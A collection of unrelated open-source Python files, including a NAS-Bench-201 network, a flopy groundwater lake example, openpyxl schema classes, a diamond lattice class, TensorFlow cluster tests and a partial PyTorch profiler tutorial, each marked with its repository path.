class ResNetBasicblock(nn.Module):
def __init__(self, inplanes, planes, stride):
super(ResNetBasicblock, self).__init__()
assert stride == 1 or stride == 2, 'invalid stride {:}'.format(stride)
self.conv_a = ReLUConvBN(inplanes, planes, 3, stride, 1, 1)
self.conv_b = ReLUConvBN(planes, planes, 3, 1, 1, 1)
if stride == 2:
self.downsample = nn.Sequential(
nn.AvgPool2d(kernel_size=2, stride=2, padding=0),
nn.Conv2d(inplanes, planes, kernel_size=1, stride=1, padding=0, bias=False))
elif inplanes != planes:
self.downsample = ReLUConvBN(inplanes, planes, 1, 1, 0, 1)
else:
self.downsample = None
self.in_dim = inplanes
self.out_dim = planes
self.stride = stride
self.num_conv = 2
def forward(self, inputs):
basicblock = self.conv_a(inputs)
basicblock = self.conv_b(basicblock)
if self.downsample is not None:
inputs = self.downsample(inputs) # residual
return inputs + basicblock
@model_wrapper
class NasBench201(nn.Module):
"""The full search space proposed by `NAS-Bench-201 <https://arxiv.org/abs/2001.00326>`__.
It's a stack of :class:`NasBench201Cell`.
"""
def __init__(self,
stem_out_channels: int = 16,
num_modules_per_stack: int = 5,
num_labels: int = 10):
super().__init__()
self.channels = C = stem_out_channels
self.num_modules = N = num_modules_per_stack
self.num_labels = num_labels
self.stem = nn.Sequential(
nn.Conv2d(3, C, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(C)
)
layer_channels = [C] * N + [C * 2] + [C * 2] * N + [C * 4] + [C * 4] * N
layer_reductions = [False] * N + [True] + [False] * N + [True] + [False] * N
C_prev = C
self.cells = nn.ModuleList()
for C_curr, reduction in zip(layer_channels, layer_reductions):
if reduction:
cell = ResNetBasicblock(C_prev, C_curr, 2)
else:
ops: Dict[str, Callable[[int, int], nn.Module]] = {
prim: lambda C_in, C_out: OPS_WITH_STRIDE[prim](C_in, C_out, 1) for prim in PRIMITIVES
}
cell = NasBench201Cell(ops, C_prev, C_curr, label='cell')
self.cells.append(cell)
C_prev = C_curr
self.lastact = nn.Sequential(
nn.BatchNorm2d(C_prev),
nn.ReLU(inplace=True)
)
self.global_pooling = nn.AdaptiveAvgPool2d(1)
self.classifier = nn.Linear(C_prev, self.num_labels)
def forward(self, inputs):
feature = self.stem(inputs)
for cell in self.cells:
feature = cell(feature)
out = self.lastact(feature)
out = self.global_pooling(out)
out = out.view(out.size(0), -1)
logits = self.classifier(out)
return logits
|
examples/scripts/flopy_lake_example.py | andrewcalderwood/flopy | 351 | 10400 | import os
import sys
import numpy as np
import matplotlib.pyplot as plt
import flopy
def run():
workspace = os.path.join("lake")
# make sure workspace directory exists
if not os.path.exists(workspace):
os.makedirs(workspace)
fext = "png"
narg = len(sys.argv)
iarg = 0
if narg > 1:
while iarg < narg - 1:
iarg += 1
basearg = sys.argv[iarg].lower()
if basearg == "--pdf":
fext = "pdf"
# save the starting path
cwdpth = os.getcwd()
# change to the working directory
os.chdir(workspace)
# We are creating a square model with a specified head equal to `h1` along all boundaries.
# The head at the cell in the center in the top layer is fixed to `h2`. First, set the name
# of the model and the parameters of the model: the number of layers `Nlay`, the number of rows
# and columns `N`, lengths of the sides of the model `L`, aquifer thickness `H`, hydraulic
# conductivity `Kh`
name = "lake_example"
h1 = 100
h2 = 90
Nlay = 10
N = 101
L = 400.0
H = 50.0
Kh = 1.0
# Create a MODFLOW model and store it (in this case in the variable `ml`, but you can call it
# whatever you want). The modelname will be the name given to all MODFLOW files (input and output).
# The exe_name should be the full path to your MODFLOW executable. The version is either 'mf2k'
# for MODFLOW2000 or 'mf2005'for MODFLOW2005.
ml = flopy.modflow.Modflow(
modelname=name, exe_name="mf2005", version="mf2005"
)
# Define the discretization of the model. All layers are given equal thickness. The `bot` array
# is build from the `Hlay` values to indicate top and bottom of each layer, and `delrow` and
# `delcol` are computed from model size `L` and number of cells `N`. Once these are all computed,
# the Discretization file is built.
bot = np.linspace(-H / Nlay, -H, Nlay)
delrow = delcol = L / (N - 1)
dis = flopy.modflow.ModflowDis(
ml,
nlay=Nlay,
nrow=N,
ncol=N,
delr=delrow,
delc=delcol,
top=0.0,
botm=bot,
laycbd=0,
)
# Next we specify the boundary conditions and starting heads with the Basic package. The `ibound`
# array will be `1` in all cells in all layers, except for along the boundary and in the cell at
# the center in the top layer where it is set to `-1` to indicate fixed heads. The starting heads
# are used to define the heads in the fixed head cells (this is a steady simulation, so none of
# the other starting values matter). So we set the starting heads to `h1` everywhere, except for
# the head at the center of the model in the top layer.
Nhalf = int((N - 1) / 2)
ibound = np.ones((Nlay, N, N), dtype=int)
ibound[:, 0, :] = -1
ibound[:, -1, :] = -1
ibound[:, :, 0] = -1
ibound[:, :, -1] = -1
ibound[0, Nhalf, Nhalf] = -1
start = h1 * np.ones((N, N))
start[Nhalf, Nhalf] = h2
# create external ibound array and starting head files
files = []
hfile = f"{name}_strt.ref"
np.savetxt(hfile, start)
hfiles = []
for kdx in range(Nlay):
file = f"{name}_ib{kdx + 1:02d}.ref"
files.append(file)
hfiles.append(hfile)
np.savetxt(file, ibound[kdx, :, :], fmt="%5d")
bas = flopy.modflow.ModflowBas(ml, ibound=files, strt=hfiles)
# The aquifer properties (really only the hydraulic conductivity) are defined with the
# LPF package.
lpf = flopy.modflow.ModflowLpf(ml, hk=Kh)
# Finally, we need to specify the solver we want to use (PCG with default values), and the
# output control (using the default values). Then we are ready to write all MODFLOW input
# files and run MODFLOW.
pcg = flopy.modflow.ModflowPcg(ml)
oc = flopy.modflow.ModflowOc(ml)
ml.write_input()
ml.run_model()
# change back to the starting directory
os.chdir(cwdpth)
# Once the model has terminated normally, we can read the heads file. First, a link to the heads
# file is created with `HeadFile`. The link can then be accessed with the `get_data` function, by
# specifying, in this case, the step number and period number for which we want to retrieve data.
# A three-dimensional array is returned of size `nlay, nrow, ncol`. Matplotlib contouring functions
# are used to make contours of the layers or a cross-section.
hds = flopy.utils.HeadFile(os.path.join(workspace, f"{name}.hds"))
h = hds.get_data(kstpkper=(0, 0))
x = y = np.linspace(0, L, N)
c = plt.contour(x, y, h[0], np.arange(90, 100.1, 0.2))
plt.clabel(c, fmt="%2.1f")
plt.axis("scaled")
outfig = os.path.join(workspace, f"lake1.{fext}")
fig = plt.gcf()
fig.savefig(outfig, dpi=300)
print("created...", outfig)
x = y = np.linspace(0, L, N)
c = plt.contour(x, y, h[-1], np.arange(90, 100.1, 0.2))
plt.clabel(c, fmt="%1.1f")
plt.axis("scaled")
outfig = os.path.join(workspace, f"lake2.{fext}")
fig = plt.gcf()
fig.savefig(outfig, dpi=300)
print("created...", outfig)
z = np.linspace(-H / Nlay / 2, -H + H / Nlay / 2, Nlay)
c = plt.contour(x, z, h[:, 50, :], np.arange(90, 100.1, 0.2))
plt.axis("scaled")
outfig = os.path.join(workspace, f"lake3.{fext}")
fig = plt.gcf()
fig.savefig(outfig, dpi=300)
print("created...", outfig)
return 0
if __name__ == "__main__":
success = run()
|
changes/api/build_coverage.py | vault-the/changes | 443 | 10473 | <reponame>vault-the/changes
from changes.api.base import APIView
from changes.lib.coverage import get_coverage_by_build_id, merged_coverage_data
from changes.models.build import Build
class BuildTestCoverageAPIView(APIView):
def get(self, build_id):
build = Build.query.get(build_id)
if build is None:
return '', 404
coverage = merged_coverage_data(get_coverage_by_build_id(build.id))
return self.respond(coverage)
|
venv/Lib/site-packages/openpyxl/worksheet/errors.py | ajayiagbebaku/NFL-Model | 5,079 | 10480 | <gh_stars>1000+
#Autogenerated schema
from openpyxl.descriptors.serialisable import Serialisable
from openpyxl.descriptors import (
Typed,
String,
Bool,
Sequence,
)
from openpyxl.descriptors.excel import CellRange
class Extension(Serialisable):
tagname = "extension"
uri = String(allow_none=True)
def __init__(self,
uri=None,
):
self.uri = uri
class ExtensionList(Serialisable):
tagname = "extensionList"
# uses element group EG_ExtensionList
ext = Sequence(expected_type=Extension)
__elements__ = ('ext',)
def __init__(self,
ext=(),
):
self.ext = ext
class IgnoredError(Serialisable):
tagname = "ignoredError"
sqref = CellRange
evalError = Bool(allow_none=True)
twoDigitTextYear = Bool(allow_none=True)
numberStoredAsText = Bool(allow_none=True)
formula = Bool(allow_none=True)
formulaRange = Bool(allow_none=True)
unlockedFormula = Bool(allow_none=True)
emptyCellReference = Bool(allow_none=True)
listDataValidation = Bool(allow_none=True)
calculatedColumn = Bool(allow_none=True)
def __init__(self,
sqref=None,
evalError=False,
twoDigitTextYear=False,
numberStoredAsText=False,
formula=False,
formulaRange=False,
unlockedFormula=False,
emptyCellReference=False,
listDataValidation=False,
calculatedColumn=False,
):
self.sqref = sqref
self.evalError = evalError
self.twoDigitTextYear = twoDigitTextYear
self.numberStoredAsText = numberStoredAsText
self.formula = formula
self.formulaRange = formulaRange
self.unlockedFormula = unlockedFormula
self.emptyCellReference = emptyCellReference
self.listDataValidation = listDataValidation
self.calculatedColumn = calculatedColumn
class IgnoredErrors(Serialisable):
tagname = "ignoredErrors"
ignoredError = Sequence(expected_type=IgnoredError)
extLst = Typed(expected_type=ExtensionList, allow_none=True)
__elements__ = ('ignoredError', 'extLst')
def __init__(self,
ignoredError=(),
extLst=None,
):
self.ignoredError = ignoredError
self.extLst = extLst
|
idaes/apps/matopt/materials/lattices/diamond_lattice.py | carldlaird/idaes-pse | 112 | 10489 | #################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
from copy import deepcopy
from math import sqrt
import numpy as np
from .unit_cell_lattice import UnitCell, UnitCellLattice
from ..geometry import Cube
from ..tiling import CubicTiling
from ..transform_func import ScaleFunc, RotateFunc
from ...util.util import ListHasPoint
class DiamondLattice(UnitCellLattice):
RefIAD = sqrt(3) / 4
# === STANDARD CONSTRUCTOR
def __init__(self, IAD):
RefUnitCellShape = Cube(1, BotBackLeftCorner=np.array([0, 0, 0], dtype=float))
RefUnitCellTiling = CubicTiling(RefUnitCellShape)
RefFracPositions = [np.array([0.0, 0.0, 0.0]),
np.array([0.5, 0.5, 0.0]),
np.array([0.0, 0.5, 0.5]),
np.array([0.5, 0.0, 0.5]),
np.array([0.25, 0.25, 0.25]),
np.array([0.25, 0.75, 0.75]),
np.array([0.75, 0.25, 0.75]),
np.array([0.75, 0.75, 0.25])]
RefUnitCell = UnitCell(RefUnitCellTiling, RefFracPositions)
UnitCellLattice.__init__(self, RefUnitCell)
self._IAD = DiamondLattice.RefIAD # IAD is set correctly after calling applyTransF
self.applyTransF(ScaleFunc(IAD / DiamondLattice.RefIAD))
self._NthNeighbors = [[[np.array([0.25, 0.25, 0.25]),
np.array([-0.25, -0.25, 0.25]),
np.array([-0.25, 0.25, -0.25]),
np.array([0.25, -0.25, -0.25])],
[np.array([-0.25, -0.25, -0.25]),
np.array([0.25, 0.25, -0.25]),
np.array([0.25, -0.25, 0.25]),
np.array([-0.25, 0.25, 0.25])]],
[[np.array([0.0, 0.5, 0.5]),
np.array([0.0, 0.5, -0.5]),
np.array([0.0, -0.5, 0.5]),
np.array([0.0, -0.5, -0.5]),
np.array([0.5, 0.5, 0.0]),
np.array([0.5, 0.0, 0.5]),
np.array([0.5, -0.5, 0.0]),
np.array([0.5, 0.0, -0.5]),
np.array([-0.5, 0.5, 0.0]),
np.array([-0.5, 0.0, 0.5]),
np.array([-0.5, -0.5, 0.0]),
np.array([-0.5, 0.0, -0.5])],
[np.array([0.0, 0.5, 0.5]),
np.array([0.0, 0.5, -0.5]),
np.array([0.0, -0.5, 0.5]),
np.array([0.0, -0.5, -0.5]),
np.array([0.5, 0.5, 0.0]),
np.array([0.5, 0.0, 0.5]),
np.array([0.5, -0.5, 0.0]),
np.array([0.5, 0.0, -0.5]),
np.array([-0.5, 0.5, 0.0]),
np.array([-0.5, 0.0, 0.5]),
np.array([-0.5, -0.5, 0.0]),
np.array([-0.5, 0.0, -0.5])]]]
self._typeDict = {0: 0, 3: 1}
self._relativePositions = {0: np.array([0.0, 0.0, 0.0]), 3: np.array([0.25, 0.25, 0.25])}
# === CONSTRUCTOR - Aligned with {100}
@classmethod
def alignedWith100(cls, IAD):
return cls(IAD) # Default implementation
# === CONSTRUCTOR - Aligned with {110}
@classmethod
def aligndWith110(cls, IAD):
result = cls(IAD)
thetaX = 0
thetaY = np.pi * 0.25
thetaZ = 0
result.applyTransF(RotateFunc.fromXYZAngles(thetaX, thetaY, thetaZ))
return result
# === CONSTRUCTOR - Aligned with {111}
@classmethod
def alignedWith111(cls, IAD, blnTrianglesAlignedWithX=True):
result = cls(IAD)
thetaX = -np.pi * 0.25
thetaY = -np.arctan2(-sqrt(2), 2)
thetaZ = (np.pi * 0.5 if blnTrianglesAlignedWithX else 0)
result.applyTransF(RotateFunc.fromXYZAngles(thetaX, thetaY, thetaZ))
return result
# === CONSTRUCTOR - Aligned with {xyz}
@classmethod
def alignedWith(cls, IAD, MI):
if (type(MI) is str) and (len(MI) == 3) and all(x.isdigit() for x in MI):
if MI in ['100', '010', '001']:
return cls(IAD)
elif MI in ['110', '101', '011']:
return cls.aligndWith110(IAD)
elif MI == '111':
return cls.alignedWith111(IAD)
else:
result = cls(IAD)
a = np.array([0.0, 0.0, 1.0])
b = np.array([float(MI[0]), float(MI[1]), float(MI[2])])
axis = np.cross(a, b)
angle = np.arccos(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))
result.applyTransF(RotateFunc.fromAxisAngle(axis, angle))
return result
return ValueError('DiamondLattice.alignedWith: Input direction is not correct.')
# === MANIPULATION METHODS
def applyTransF(self, TransF):
if isinstance(TransF, ScaleFunc):
if TransF.isIsometric:
self._IAD *= TransF.Scale[0]
else:
raise ValueError('DiamondLattice.applyTransF: Can only scale isometrically')
UnitCellLattice.applyTransF(self, TransF)
# === AUXILIARY METHODS
def _getPointType(self, P):
return (int(round(P[0] * 4)) + int(round(P[1] * 4)) + int(round(P[2] * 4))) % 4
# === PROPERTY EVALUATION METHODS
# NOTE: inherited from UnitCellLattice
# def isOnLattice(self,P):
def areNeighbors(self, P1, P2):
return np.linalg.norm(P2 - P1) <= self.IAD
def getNeighbors(self, P, layer=1):
RefP = self._getConvertToReference(P)
PType = self._getPointType(RefP)
if PType not in self._typeDict.keys():
raise ValueError('DiamondLattice.getNeighbors Should never reach here!')
if layer > len(self._NthNeighbors):
self._calculateNeighbors(layer)
NBs = deepcopy(self._NthNeighbors[layer - 1][self._typeDict[PType]])
for NeighP in NBs:
NeighP += RefP
self._convertFromReference(NeighP)
return NBs
def _calculateNeighbors(self, layer):
NList = []
for k, v in self._typeDict.items():
tmp = [np.array([0, 0, 0], dtype=float)]
for nb in self._NthNeighbors:
tmp.extend(nb[v])
NList.append(tmp)
for _ in range(layer - len(self._NthNeighbors)):
tmp = [[] for _ in self._typeDict.keys()]
for k, v in self._typeDict.items():
for P in self._NthNeighbors[len(self._NthNeighbors) - 1][v]:
PType = self._getPointType(P + self._relativePositions[k])
for Q in self._NthNeighbors[0][self._typeDict[PType]]:
N = P + Q
if not ListHasPoint(NList[v], N, 0.001 * DiamondLattice.RefIAD):
tmp[v].append(N)
NList[v].append(N)
self._NthNeighbors.append(tmp)
def isASite(self, P):
RefP = self._getConvertToReference(P)
PType = self._getPointType(RefP)
return PType == 0
def isBSite(self, P):
RefP = self._getConvertToReference(P)
PType = self._getPointType(RefP)
return PType == 3
def setDesign(self, D, AType, BType):
for i, P in enumerate(D.Canvas.Points):
if self.isASite(P):
D.setContent(i, AType)
elif self.isBSite(P):
D.setContent(i, BType)
else:
raise ValueError('setDesign can not set site not on lattice')
# === BASIC QUERY METHODS
@property
def IAD(self):
return self._IAD
@property
def Diamond100LayerSpacing(self):
return self.IAD / sqrt(3)
@property
def Diamond110LayerSpacing(self):
return self.IAD * sqrt(2) / sqrt(3)
@property
def Diamond111LayerSpacing(self):
return self.IAD * 4 / 3
@property
def Diamond112LayerSpacing(self):
return self.IAD * sqrt(2) / 3
def getLayerSpacing(self, MI):
if (type(MI) is str) and (len(MI) == 3) and all(x.isdigit() for x in MI):
if MI in ['100', '010', '001']:
return self.Diamond100LayerSpacing
elif MI in ['110', '101', '011']:
return self.Diamond110LayerSpacing
elif MI == '111':
return self.Diamond111LayerSpacing
elif MI in ['112', '121', '211']:
return self.Diamond112LayerSpacing
else:
raise NotImplementedError('DiamondLattice.getLayerSpacing: Input direction is not supported.')
return ValueError('DiamondLattice.getLayerSpacing: Input direction is not correct.')
def getShellSpacing(self, MI):
if (type(MI) is str) and (len(MI) == 3) and all(x.isdigit() for x in MI):
if MI in ['100', '010', '001', '110', '101', '011', '111']:
return self.IAD * sqrt(8) / sqrt(3)
elif MI in ['112', '121', '211']:
return self.IAD * sqrt(2) / sqrt(3)
else:
raise NotImplementedError('DiamondLattice.getShellSpacing: Input direction is not supported.')
return ValueError('The input direction is not correct.')
def getUniqueLayerCount(self, MI):
if (type(MI) is str) and (len(MI) == 3) and all(x.isdigit() for x in MI):
if MI in ['100', '010', '001']:
return 4
elif MI in ['110', '101', '011']:
return 2
elif MI == '111':
return 3
elif MI in ['112', '121', '211']:
return 6
else:
raise NotImplementedError('DiamondLattice.getUniqueLayerCount: Input direction is not supported.')
return ValueError('The input direction is not correct.')
|
test/tc/tet_tc_base_predict_multiclass.py | dumpmemory/Pytorch-NLU | 115 | 10501 | # !/usr/bin/python
# -*- coding: utf-8 -*-
# @time : 2021/7/25 19:30
# @author : Mo
# @function: predict model, 预测模块-多类分类
# 适配linux
import platform
import json
import sys
import os
path_root = os.path.abspath(os.path.join(os.path.dirname(__file__), "../.."))
path_sys = os.path.join(path_root, "pytorch_nlu", "pytorch_textclassification")
print(path_root)
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
from tcPredict import TextClassificationPredict
if __name__ == "__main__":
path_config = "../output/text_classification/model_ERNIE/tc.config"
tcp = TextClassificationPredict(path_config)
texts = [{"text": "平乐县,古称昭州,隶属于广西壮族自治区桂林市,位于广西东北部,桂林市东南部,东临钟山县,南接昭平,西北毗邻阳朔,北连恭城,总面积1919.34平方公里。"},
{"text": "平乐县主要旅游景点有榕津千年古榕、冷水石景苑、仙家温泉、桂江风景区、漓江风景区等,平乐县为漓江分界点,平乐以北称漓江,以南称桂江,是著名的大桂林旅游区之一。"},
{"text": "印岭玲珑,昭水晶莹,环绕我平中。青年的乐园,多士受陶熔。生活自觉自治,学习自发自动。五育并重,手脑并用。迎接新潮流,建设新平中"},
{"text": "桂林山水甲天下, 阳朔山水甲桂林"},
]
res = tcp.predict(texts, logits_type="sigmoid")
print(res)
while True:
print("请输入:")
question = input()
res = tcp.predict([{"text": question}], logits_type="sigmoid")
print(res)
|
tensorflow/python/training/localhost_cluster_performance_test.py | connectthefuture/tensorflow | 101 | 10512 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests and benchmarks for creating RPC clusters on localhost."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
import portpicker
import tensorflow as tf
def create_local_cluster(num_workers, num_ps, protocol="grpc"):
"""Create local GRPC servers and return their servers."""
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]}
cs = tf.train.ClusterSpec(cluster_dict)
workers = [
tf.train.Server(
cs, job_name="worker", protocol=protocol, task_index=ix, start=True)
for ix in range(num_workers)]
ps_servers = [
tf.train.Server(
cs, job_name="ps", protocol=protocol, task_index=ix, start=True)
for ix in range(num_ps)]
return workers, ps_servers
class CreateLocalClusterTest(tf.test.TestCase):
def testCreateLocalCluster(self):
workers, _ = create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
var0 = tf.Variable(0.0)
with tf.device("/job:ps/task:1"):
var1 = tf.Variable(1.0)
worker_sessions[0].run([var0.initializer, var1.initializer])
with tf.device("/job:ps/task:0"):
var2 = tf.Variable(2.0)
with tf.device("/job:ps/task:1"):
var3 = tf.Variable(3.0)
worker_sessions[1].run([var2.initializer, var3.initializer])
# Read values back in the opposite session
self.assertAllEqual(0.0, var0.eval(session=worker_sessions[1]))
self.assertAllEqual(1.0, var1.eval(session=worker_sessions[1]))
self.assertAllEqual(2.0, var2.eval(session=worker_sessions[0]))
self.assertAllEqual(3.0, var3.eval(session=worker_sessions[0]))
class CreateLocalClusterBenchmark(tf.test.Benchmark):
def benchmarkCreateLocalCluster(self):
deltas = []
iters = 5
for _ in range(iters):
start_time = time.time()
create_local_cluster(num_workers=1, num_ps=10)
end_time = time.time()
deltas.append(end_time - start_time)
median_deltas = np.median(deltas)
print(
"\n\nbenchmark_create_local_cluster_1_worker_10_ps. "
"iterations: %d, median wall time: %g\n\n" % (iters, median_deltas))
self.report_benchmark(
iters=iters,
wall_time=median_deltas,
name="benchmark_create_local_cluster_1_worker_10_ps")
class PartitionedVariablesBenchmark(tf.test.Benchmark):
def benchmark_create_1000_partitions_with_100_parameter_servers(self):
workers, _ = create_local_cluster(num_workers=1, num_ps=100)
worker_sessions = [tf.Session(w.target) for w in workers]
worker = worker_sessions[0]
partition_sizes = (1, 512, 1024*32, 1024*128)
partitioned = []
for partition_size in partition_sizes:
# max_shard_bytes is 4, shape is 1000*partition_size float32s which should
# partition into 1000 shards, each containing partition_size float32s.
print("Building partitioned variable with %d floats per partition"
% partition_size)
with tf.device(tf.train.replica_device_setter(ps_tasks=100)):
partitioned_ix = tf.get_variable(
"partitioned_%d" % partition_size,
shape=[1000 * partition_size],
dtype=tf.float32,
# Each partition to have exactly N float32s
partitioner=tf.variable_axis_size_partitioner(
max_shard_bytes=4 * partition_size))
# Concatenates along axis 0
partitioned.append(tf.convert_to_tensor(partitioned_ix))
tf.global_variables_initializer().run(session=worker)
for ix, partition_size in enumerate(partition_sizes):
print("Running benchmark having partitions with %d floats"
% partition_size)
self.run_op_benchmark(
worker,
partitioned[ix],
name=("read_concat_1000_partitions_from_"
"100_parameter_servers_partsize_%d_floats" % partition_size))
if __name__ == "__main__":
tf.test.main()
|
bell2014/energy/prob_abs_s.py | dmaugis/intrinsic | 134 | 10525 | <gh_stars>100-1000
import numpy as np
class ProbAbsoluteShading(object):
def __init__(self, params):
self.params = params
def cost(self, s_nz):
if self.params.abs_shading_weight:
if self.params.abs_shading_log:
return self.params.abs_shading_weight * \
np.abs(np.log(s_nz) - np.log(self.params.abs_shading_gray_point))
else:
return self.params.abs_shading_weight * \
np.abs(s_nz - self.params.abs_shading_gray_point)
else:
return 0
|
code/ch_02_foundations/_02_noneness.py | SuppMonkey/write.pythonic.code | 679 | 10534 | <filename>code/ch_02_foundations/_02_noneness.py<gh_stars>100-1000
def find_accounts(search_text):
# perform search...
if not db_is_available:
return None
# returns a list of account IDs
return db_search(search_text)
accounts = find_accounts('python')
if accounts is None:
print("Error: DB not available")
else:
print("Accounts found: Would list them here...")
def db_search(search_text):
return [1, 11]
db_is_availble = True
|
docs/_downloads/dbc5873471dad3c21022112121cbd008/tensorboard_profiler_tutorial.py | woojinsong/PyTorch-tutorials-kr | 221 | 10557 | """
PyTorch Profiler With TensorBoard
====================================
This tutorial demonstrates how to use TensorBoard plugin with PyTorch Profiler
to detect performance bottlenecks of the model.
Introduction
------------
PyTorch 1.8 includes an updated profiler API capable of
recording the CPU side operations as well as the CUDA kernel launches on the GPU side.
The profiler can visualize this information
in TensorBoard Plugin and provide analysis of the performance bottlenecks.
In this tutorial, we will use a simple Resnet model to demonstrate how to
use TensorBoard plugin to analyze model performance.
Setup
-----
To install ``torch`` and ``torchvision`` use the following command:
::
pip install torch torchvision
"""
######################################################################
# Steps
# -----
#
# 1. Prepare the data and model
# 2. Use profiler to record execution events
# 3. Run the profiler
# 4. Use TensorBoard to view results and analyze model performance
# 5. Improve performance with the help of profiler
# 6. Analyze performance with other advanced features
#
# 1. Prepare the data and model
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# First, import all necessary libraries:
#
import torch
import torch.nn
import torch.optim
import torch.profiler
import torch.utils.data
import torchvision.datasets
import torchvision.models
import torchvision.transforms as T
######################################################################
# Then prepare the input data. For this tutorial, we use the CIFAR10 dataset.
# Transform it to the desired format and use DataLoader to load each batch.
transform = T.Compose(
[T.Resize(224),
T.ToTensor(),
T.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
train_set = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform)
train_loader = torch.utils.data.DataLoader(train_set, batch_size=32, shuffle=True)
######################################################################
# Next, create Resnet model, loss function, and optimizer objects.
# To run on GPU, move model and loss to GPU device.
device = torch.device("cuda:0")
model = torchvision.models.resnet18(pretrained=True).cuda(device)
criterion = torch.nn.CrossEntropyLoss().cuda(device)
optimizer = torch.optim.SGD(model.parameters(), lr=0.001, momentum=0.9)
model.train()
######################################################################
# Define the training step for each batch of input data.
def train(data):
inputs, labels = data[0].to(device=device), data[1].to(device=device)
outputs = model(inputs)
loss = criterion(outputs, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
######################################################################
# 2. Use profiler to record execution events
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# The profiler is enabled through the context manager and accepts several parameters,
# some of the most useful are:
#
# - ``schedule`` - callable that takes step (int) as a single parameter
# and returns the profiler action to perform at each step.
#
# In this example with ``wait=1, warmup=1, active=3, repeat=2``,
# profiler will skip the first step/iteration,
# start warming up on the second,
# record the following three iterations,
# after which the trace will become available and on_trace_ready (when set) is called.
# In total, the cycle repeats twice. Each cycle is called a "span" in TensorBoard plugin.
#
# During ``wait`` steps, the profiler is disabled.
# During ``warmup`` steps, the profiler starts tracing but the results are discarded.
# This is for reducing the profiling overhead.
# The overhead at the beginning of profiling is high and easy to bring skew to the profiling result.
# During ``active`` steps, the profiler works and records events.
# - ``on_trace_ready`` - callable that is called at the end of each cycle;
# In this example we use ``torch.profiler.tensorboard_trace_handler`` to generate result files for TensorBoard.
# After profiling, result files will be saved into the ``./log/resnet18`` directory.
# Specify this directory as a ``logdir`` parameter to analyze profile in TensorBoard.
# - ``record_shapes`` - whether to record shapes of the operator inputs.
# - ``profile_memory`` - Track tensor memory allocation/deallocation.
# - ``with_stack`` - Record source information (file and line number) for the ops.
# If the TensorBoard is launched in VSCode (`reference <https://code.visualstudio.com/docs/datascience/pytorch-support#_tensorboard-integration>`_),
# clicking a stack frame will navigate to the specific code line.
with torch.profiler.profile(
schedule=torch.profiler.schedule(wait=1, warmup=1, active=3, repeat=2),
on_trace_ready=torch.profiler.tensorboard_trace_handler('./log/resnet18'),
record_shapes=True,
with_stack=True
) as prof:
for step, batch_data in enumerate(train_loader):
if step >= (1 + 1 + 3) * 2:
break
train(batch_data)
prof.step() # Need to call this at the end of each step to notify profiler of steps' boundary.
######################################################################
# 3. Run the profiler
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Run the above code. The profiling result will be saved under ``./log/resnet18`` directory.
######################################################################
# 4. Use TensorBoard to view results and analyze model performance
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Install PyTorch Profiler TensorBoard Plugin.
#
# ::
#
# pip install torch_tb_profiler
#
######################################################################
# Launch the TensorBoard.
#
# ::
#
# tensorboard --logdir=./log
#
######################################################################
# Open the TensorBoard profile URL in Google Chrome browser or Microsoft Edge browser.
#
# ::
#
# http://localhost:6006/#pytorch_profiler
#
######################################################################
# You could see Profiler plugin page as shown below.
#
# - Overview
# .. image:: ../../_static/img/profiler_overview1.png
# :scale: 25 %
#
# The overview shows a high-level summary of model performance.
#
# The "GPU Summary" panel shows the GPU configuration and the GPU usage.
# In this example, the GPU Utilization is low.
# The details of these metrics are `here <https://github.com/guyang3532/kineto/blob/readme/tb_plugin/docs/gpu_utilization.md>`_.
#
# The "Step Time Breakdown" shows distribution of time spent in each step over different categories of execution.
# In this example, you can see the ``DataLoader`` overhead is significant.
#
# The bottom "Performance Recommendation" uses the profiling data
# to automatically highlight likely bottlenecks,
# and gives you actionable optimization suggestions.
#
# You can change the view page in left "Views" dropdown list.
#
# .. image:: ../../_static/img/profiler_views_list.png
# :alt:
#
#
# - Operator view
# The operator view displays the performance of every PyTorch operator
# that is executed either on the host or device.
#
# .. image:: ../../_static/img/profiler_operator_view.png
# :scale: 25 %
# The "Self" duration does not include its child operators’ time.
# The "Total" duration includes its child operators’ time.
#
# - View call stack
# Click the "View Callstack" of an operator, the operators with same name but different call stacks will be shown.
# Then click a "View Callstack" in this sub-table, the call stack frames will be shown.
#
# .. image:: ../../_static/img/profiler_callstack.png
# :scale: 25 %
#
# If the TensorBoard is launched inside VSCode
# (`Launch Guide <https://devblogs.microsoft.com/python/python-in-visual-studio-code-february-2021-release/#tensorboard-integration>`_),
